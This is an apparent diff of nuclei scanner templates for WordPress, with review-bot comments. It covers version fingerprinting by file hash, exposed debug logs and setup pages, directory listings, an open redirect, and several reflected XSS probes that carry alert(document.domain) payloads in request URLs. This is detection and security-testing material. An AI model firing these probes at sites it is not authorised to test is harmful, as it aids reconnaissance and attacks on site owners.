"(\"46a432b956c0aa599d0661076c636988\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"b8da6794ad8af3a4ffc0dab408d5a8a0\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"3a392ddb8a382f78215c8d3c5d34d422\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"88fd998db24c3ce51b47c2e00e95db67\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"3498b476348ae4d361dc02e197203990\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"cd36cae0d297bfcc3bb4884f539d9840\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ad896ee63ddc505b6e098f6d308fdcef\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f01e2f651ed5d26422e4f5edbb3548aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin.js" + matchers: + - type: dsl + 
name: 3.7 - 3.8.33 + dsl: + - "(\"7bb6e432495c6711766e3c395ee95b01\" == md5(body))" + - type: dsl + name: 3.2 - 3.6.1 + dsl: + - "(\"0f132c90124ed40d6df71f1d4fabe557\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9530e2e519bd75ba1748656ee1d2aa12\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"c3385371567df30afda2c9a49129bb5e\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"8f4bf29880b0cccbddfdcf1688c93622\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen.min.js" + matchers: + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"d6a88a01bdc839e38c5a25c3533d32c4\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"3534e4ec4ef74d6a8daafa225c11c918\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ae2adb4cebb8b6c3dd3cc87b51c5061a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"a5f47f22759ae243dd731c1b8a7f0495\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"1431f5bb512892f9e9f39a8d7ece041c\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"e31f737d7be3c5c6014934ccd445b808\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"8d70b30ab1e79965258c2244cb06040a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fd051b6fe06fa0636fefa788eeec7725\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/revisions.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.9 + dsl: + - "(\"0886448d087ccc0cb432130320821f69\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"189a4d84349fe1f4dfa0ec48c82efb04\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"62b95e8d4f6d5dc32797b9f08339446e\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"3253906cffe4523bc05d0632af4c6af8\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5cff0abc8bb329e36a744280b563e9da\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + 
dsl: + - "(\"06c4a5b77bd61413bc4b74d88bfe9012\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"32caf54248666d9ff6666ae57d66cc09\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"2e3fc3b910c3ffa7dd0bd1b939f955a0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"53d6b76b1495528760964cb5414167df\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d1587acf93ef6d0fc64758d984f50d56\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"dfd2373522730d2d80e1437af0e38df2\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"1fb7a1551bbc89fa0b13cf037997832c\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"540ab4f75671456980a28d78f48c8587\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/quicktags.min.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"f371f1d8aef9c3cb12cbdfa97cf7bd2f\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"6a365c2fcd52566ae9fd3db9a28c673d\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"fa5d97a49168b7454a06fa0e195fce4d\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"0d7a0005ba6a1fa29037258ddd1a2034\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"d8427236a194f26c0902c12b3235cc60\" == md5(body))" + - type: dsl + name: 3.9 - 4.0 + dsl: + - "(\"8dd40bc29c66e85694b8b55f8489238a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"f1264b60d66121394ec5833588826155\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"5f7c8cb8f33b0e319d7ede4a8eb97ee3\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"3acba502428f381b73603c025c96b37a\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d93d32c5f16e2b5169f5d2118cb58d08\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"ed0bdd8e94c8119ba32f0cccb0fa6ee3\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - 
"(\"8d703bfea23a93f5679e25d60ef16593\" == md5(body))"
+ - type: dsl
+ name: 5.4 - 5.6
+ dsl:
+ - "(\"47c0382048df8a6ea5e976e3b33a630c\" == md5(body))"
+ - type: dsl
+ name: 3.8.34 - 3.8.35
+ dsl:
+ - "(\"0afb211552df727de680e1ba9b67e4fb\" == md5(body))"
+ - type: dsl
+ name: 3.7.34 - 3.7.35
+ dsl:
+ - "(\"29ee8f15afeff636713ca503e8a39250\" == md5(body))"
diff --git a/poc/wordpress/wp-ambience-xss-11407.yaml b/poc/wordpress/wp-ambience-xss-11407.yaml
new file mode 100644
index 0000000000..d79af60651
--- /dev/null
+++ b/poc/wordpress/wp-ambience-xss-11407.yaml
@@ -0,0 +1,24 @@
+id: wp-ambience-xss
+info:
+ name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://www.exploit-db.com/exploits/38568
+ tags: wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<body onload=alert(1)>"
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-arforms-listing-11415.yaml b/poc/wordpress/wp-arforms-listing-11415.yaml
new file mode 100644
index 0000000000..6cd1b149a0
--- /dev/null
+++ b/poc/wordpress/wp-arforms-listing-11415.yaml
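Review bot: The `tags` line in wp-ambience-xss-11407.yaml labels this template `wp-plugin`, but the name and the request path (`/wp-content/themes/ambience/thumb.php`) show it targets a theme, so tag-based selection and reporting will file the finding under the wrong component; I would write `tags: wordpress,xss,wp-theme`. The file also uses the legacy top-level `requests:` key, while wp-arforms-listing-11415.yaml in the same commit uses `http:`; switching to `http:` keeps the set consistent. A short `description:` saying that the `src` parameter of thumb.php appears to be echoed back without encoding (which is what the body matcher checks for) would give triagers context that the reference link alone does not.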
@@ -0,0 +1,31 @@
+id: wp-arforms-listing
+
+info:
+ name: WordPress Plugin Arforms Listing
+ author: pussycat0x
+ severity: info
+ description: Searches for sensitive directories present in the arforms plugin.
+ reference:
+ - https://www.exploit-db.com/ghdb/6424
+ metadata:
+ max-request: 1
+ tags: listing,plugin,edb,wordpress
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arforms/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "wp-content/plugins/arforms/"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100d0e4ba31e2d469f96b68276c0c2b88f8f521cbd3eb8008980091875edcaf682702206df949e104c4c4e9658a894fd57b06ac5f4cee88936ad35058eab9361f8a953e:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-code-snippets-xss-11426.yaml b/poc/wordpress/wp-code-snippets-xss-11426.yaml
index e8d6ab0586..d6d4c61340 100644
--- a/poc/wordpress/wp-code-snippets-xss-11426.yaml
+++ b/poc/wordpress/wp-code-snippets-xss-11426.yaml
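Review bot: The word matcher in wp-arforms-listing-11415.yaml checks `Index of` and `wp-content/plugins/arforms/` as two independent strings, so any 200 response that contains both (for example a page that echoes the requested path next to unrelated "Index of" text) would be reported as an open directory listing. Tying the two together in one pattern is tighter and still covers sub-directory installs: `- type: regex`, `regex:`, `- "Index of /[^<]*wp-content/plugins/arforms"`. The `description` could also say what the finding means for the owner, namely that directory indexing is enabled on the plugin folder and its files can be enumerated.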
@@ -1,21 +1,13 @@ id: wp-code-snippets-xss - info: - name: WordPress Code Snippets - Cross-Site Scripting + name: Code Snippets Wordpress Plugin - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: WordPress Code Snippets plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link reference: - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 2 tags: wordpress,xss,wp-plugin,authenticated - -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,7 +20,7 @@ http: - | GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word @@ -38,13 +30,10 @@ http: - 'toplevel_page_snippets' - 'Search results in tag' condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 4a0a004730450221008d2f407e72ae3777c6f804c5ffc234ab5d73c7cbb7ff65d90c46c68db7d23bd502206e8386152273c3bf23bee6ba0097f03efac95c1d559b795ef2a3703aa7c1ac08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
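Review bot: The new side of wp-code-snippets-xss-11426.yaml goes back from `http:` to the legacy `requests:` key and deletes the `classification` block (CVSS vector, score and `cwe-id: CWE-80`) together with `max-request`, while wp-config-setup.yaml in the same commit migrates in the opposite direction. I would keep `http:` and the `classification` block so that anything triaging findings by severity metadata still receives it. The last hunk also removes the `# digest:` trailer, so the file loses its signature. The same downgrade appears in the hunks for wp-full-path-disclosure.yaml and wp-iwp-client-listing-11478.yaml further down.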
diff --git a/poc/wordpress/wp-code-snippets-xss-11425.yaml b/poc/wordpress/wp-code-snippets-xss.yaml similarity index 100% rename from poc/wordpress/wp-code-snippets-xss-11425.yaml rename to poc/wordpress/wp-code-snippets-xss.yaml diff --git a/poc/wordpress/wp-config-setup.yaml b/poc/wordpress/wp-config-setup.yaml index f7b513af91..3ef91520f3 100644 --- a/poc/wordpress/wp-config-setup.yaml +++ b/poc/wordpress/wp-config-setup.yaml @@ -1,19 +1,28 @@ id: wp-config-setup + info: name: WordPress Setup Configuration author: princechaddha severity: high - reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ - tags: wordpress -requests: + reference: + - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ + metadata: + max-request: 1 + tags: wordpress,setup + +http: - method: GET path: - "{{BaseURL}}/wp-admin/setup-config.php?step=1" + matchers-condition: and matchers: - type: word words: - "Below you should enter your database connection details." + - type: status status: - 200 + +# digest: 4b0a00483046022100e979a8be5bb6a555e42d5d6d7e12f302f4a0a0f20ac4bdf0da56786206432cbb022100b26fd2d09915a684fcb09f935ad6af161008ff39c7f3d094484a20a7c1008ba3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-custom-tables-xss-11433.yaml b/poc/wordpress/wp-custom-tables-xss-11433.yaml new file mode 100644 index 0000000000..cae9eef28f --- /dev/null +++ b/poc/wordpress/wp-custom-tables-xss-11433.yaml 
@@ -0,0 +1,26 @@ +id: wp-custom-tables-xss +info: + name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability + reference: + - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "</script><script>alert(document.domain)</script>" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-custom-tables-xss-11434.yaml b/poc/wordpress/wp-custom-tables-xss-11434.yaml deleted file mode 100644 index 834b3dbd81..0000000000 --- a/poc/wordpress/wp-custom-tables-xss-11434.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-custom-tables-xss -info: - name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) - author: daffainfo - severity: medium - description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "</script><script>alert(document.domain)</script>" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-custom-tables-xss-11435.yaml b/poc/wordpress/wp-custom-tables-xss-11435.yaml index cae9eef28f..958241da6b 100644 --- a/poc/wordpress/wp-custom-tables-xss-11435.yaml 
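Review bot: wp-custom-tables-xss-11433.yaml is added with `id: wp-custom-tables-xss`, the same id the commit keeps in wp-custom-tables-xss-11435.yaml, and both files send the identical request with identical matchers. Loading both probes the target twice and produces findings that cannot be told apart by template id. I would keep one file per id, or give each variant a distinct id (for example `id: wp-custom-tables-xss-11433`). The three wp-grimag-open-redirect files later in the patch share one id in the same way and also disagree on `severity` (`low` in -11458 and -11461, `medium` in -11462).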
+++ b/poc/wordpress/wp-custom-tables-xss-11435.yaml @@ -1,26 +1,30 @@ id: wp-custom-tables-xss + info: name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) author: daffainfo severity: medium description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: - - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 + reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 tags: wordpress,xss,wp-plugin + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/wordpress/wp-debug-log.yaml b/poc/wordpress/wp-debug-log.yaml old mode 100755 new mode 100644 index 2658a93803..8b743b299e --- a/poc/wordpress/wp-debug-log.yaml +++ b/poc/wordpress/wp-debug-log.yaml 
@@ -1,43 +1,25 @@ id: wp-debug-log info: name: WordPress debug log - author: - - l0ne1y - description: |- - WordPress debug log 调试信息泄漏漏洞 - WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 - WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 + author: geraldino2,dwisiswant0 severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com - - 临时修复方案: - 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 - 2、将敏感信息进行加密存储,非必要不可发送前端 - 3、发送敏感信息时需加密传输,如有必要需脱敏处理 - 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 - 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 - 令、会话标识jsessionid等), 防止敏感信息泄漏。 - 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 - 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 - 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + tags: wordpress,log requests: -- matchers: - - type: word - condition: or - part: header - words: - - octet-stream - - text/plain - - type: regex - part: body - regex: - - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/wp-content/debug.log' - method: GET + - method: GET + path: + - "{{BaseURL}}/wp-content/debug.log" + matchers-condition: and + matchers: + - type: word + words: + - octet-stream + - text/plain + part: header + condition: or + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-email-subscribers-listing-11443.yaml b/poc/wordpress/wp-email-subscribers-listing-11443.yaml index 01c60a37cb..3752821e40 100644 --- a/poc/wordpress/wp-email-subscribers-listing-11443.yaml +++ b/poc/wordpress/wp-email-subscribers-listing-11443.yaml @@ -4,7 +4,8 @@ info: author: pussycat0x severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6428 + reference: + - https://www.exploit-db.com/ghdb/6428 tags: wordpress,listing,plugin requests: - method: GET 
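Review bot: The body regex on the new side of wp-debug-log.yaml opens with an unescaped `[`, so `[[0-9]{2}` is read as a character class of `[` and digits instead of a literal bracket followed by the day, and the `]` before ` PHP` is unescaped as well. It still matches typical debug.log lines because the pattern is unanchored, but the opening bracket of the timestamp is never required. I would escape both brackets and use single quotes so YAML leaves the backslashes alone: `- '\[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}\] PHP'`. The hunk also drops the `description` and `remediation` text without an English replacement; a short `description` of what an exposed debug log reveals would help whoever triages the finding.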
diff --git a/poc/wordpress/wp-email-subscribers-listing.yaml b/poc/wordpress/wp-email-subscribers-listing.yaml deleted file mode 100644 index 3752821e40..0000000000 --- a/poc/wordpress/wp-email-subscribers-listing.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wp-email-subscribers-listing -info: - name: WordPress Plugin Email Subscribers Listing - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6428 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/email-subscribers" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/email-subscribers" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-finder-xss-11445.yaml b/poc/wordpress/wp-finder-xss-11445.yaml deleted file mode 100644 index 76d5b6e588..0000000000 --- a/poc/wordpress/wp-finder-xss-11445.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wp-finder-xss -info: - name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.securityfocus.com/bid/55217/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "</script><script>alert(document.domain)</script>" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-finder-xss-11448.yaml b/poc/wordpress/wp-finder-xss-11448.yaml index b6a54990e1..3f70b6efc9 100644 --- a/poc/wordpress/wp-finder-xss-11448.yaml +++ b/poc/wordpress/wp-finder-xss-11448.yaml 
@@ -3,17 +3,18 @@ info: name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/55217/info + reference: + - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "<script>alert(123);</script>" + - "</script><script>alert(document.domain)</script>" part: body - type: word part: header diff --git a/poc/wordpress/wp-flagem-xss-11454.yaml b/poc/wordpress/wp-flagem-xss-11454.yaml index bc74462f47..90505bc2e4 100644 --- a/poc/wordpress/wp-flagem-xss-11454.yaml +++ b/poc/wordpress/wp-flagem-xss-11454.yaml @@ -1,24 +1,29 @@ id: wp-flagem-xss + info: name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium reference: https://www.exploit-db.com/exploits/38674 tags: wordpress,xss,wp-plugin + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/wordpress/wp-force-ssl.yaml b/poc/wordpress/wp-force-ssl.yaml new file mode 100644 index 0000000000..4749c95584 --- /dev/null +++ b/poc/wordpress/wp-force-ssl.yaml 
@@ -0,0 +1,59 @@ +id: wp-force-ssl + +info: + name: > + WP Force SSL & HTTPS SSL Redirect <= 1.66 - Missing Authorization to Settings Update + author: topscoder + severity: low + description: > + The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 4.2 + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-force-ssl/" + google-query: inurl:"/wp-content/plugins/wp-force-ssl/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-force-ssl,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-force-ssl/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-force-ssl" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.66') \ No newline at end of file diff --git a/poc/wordpress/wp-full-path-disclosure-11455.yaml b/poc/wordpress/wp-full-path-disclosure-11455.yaml new file mode 100644 index 0000000000..b4be682139 --- /dev/null +++ b/poc/wordpress/wp-full-path-disclosure-11455.yaml 
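Review bot: The `classification` block in wp-force-ssl.yaml carries an empty `cve-id:` while `tags` starts with `cve`, and `shodan-query: 'vuln:'` is a query with no value. I would remove the empty `cve-id:` key, the `cve` tag and the `shodan-query` line until an identifier actually exists. Detection rests only on the `Stable tag` value in readme.txt compared with `<= 1.66`, so a match indicates an outdated plugin version and not a confirmed missing capability check on `ajax_save_setting`; stating that in `description` would set the right expectation for triage.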
@@ -0,0 +1,16 @@ +id: wp-full-path-disclosure +info: + name: Wordpress Full Path Disclosure + author: arcc + severity: info + reference: https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files + tags: debug,wordpress,fpd +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/rss-functions.php" + matchers: + - type: word + words: + - 'Call to undefined function _deprecated_file()' + part: body diff --git a/poc/wordpress/wp-full-path-disclosure-11457.yaml b/poc/wordpress/wp-full-path-disclosure-11457.yaml deleted file mode 100644 index 2909076981..0000000000 --- a/poc/wordpress/wp-full-path-disclosure-11457.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: wp-full-path-disclosure -info: - name: Wordpress - Path Disclosure - author: arcc - severity: info - reference: - - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files - - https://core.trac.wordpress.org/ticket/38317 - tags: debug,wordpress,fpd -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/rss-functions.php" - matchers: - - type: word - words: - - 'Call to undefined function _deprecated_file()' - part: body diff --git a/poc/wordpress/wp-full-path-disclosure.yaml b/poc/wordpress/wp-full-path-disclosure.yaml index 24ce07f4e7..2909076981 100644 --- a/poc/wordpress/wp-full-path-disclosure.yaml +++ b/poc/wordpress/wp-full-path-disclosure.yaml @@ -1,5 +1,4 @@ id: wp-full-path-disclosure - info: name: Wordpress - Path Disclosure author: arcc 
@@ -7,19 +6,13 @@ info: reference: - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files - https://core.trac.wordpress.org/ticket/38317 - metadata: - max-request: 1 tags: debug,wordpress,fpd - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-includes/rss-functions.php" - matchers: - type: word words: - 'Call to undefined function _deprecated_file()' part: body - -# digest: 4b0a00483046022100801bbde5d695128c523449e3f13cbcfbdbc6fac825395e2524cd6b020c4e401e022100b3912dc6c4be228a8c60c03136e6707c7b5482f0b095c9c1c530eed718f0862f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-grimag-open-redirect-11458.yaml b/poc/wordpress/wp-grimag-open-redirect-11458.yaml new file mode 100644 index 0000000000..07e6edb532 --- /dev/null +++ b/poc/wordpress/wp-grimag-open-redirect-11458.yaml @@ -0,0 +1,17 @@ +id: wp-grimag-open-redirect +info: + name: WordPress Grimag Themes < 1.1.1 Open Redirection + author: 0x_Akoko + description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. + reference: https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a + severity: low + tags: wordpress,wp-theme,redirect +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/poc/wordpress/wp-grimag-open-redirect-11461.yaml b/poc/wordpress/wp-grimag-open-redirect-11461.yaml index 07e6edb532..40803f329c 100644 --- a/poc/wordpress/wp-grimag-open-redirect-11461.yaml +++ b/poc/wordpress/wp-grimag-open-redirect-11461.yaml 
